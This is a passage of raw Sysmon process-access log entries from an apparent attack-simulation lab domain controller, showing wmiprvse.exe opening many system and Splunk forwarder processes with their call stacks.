15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program 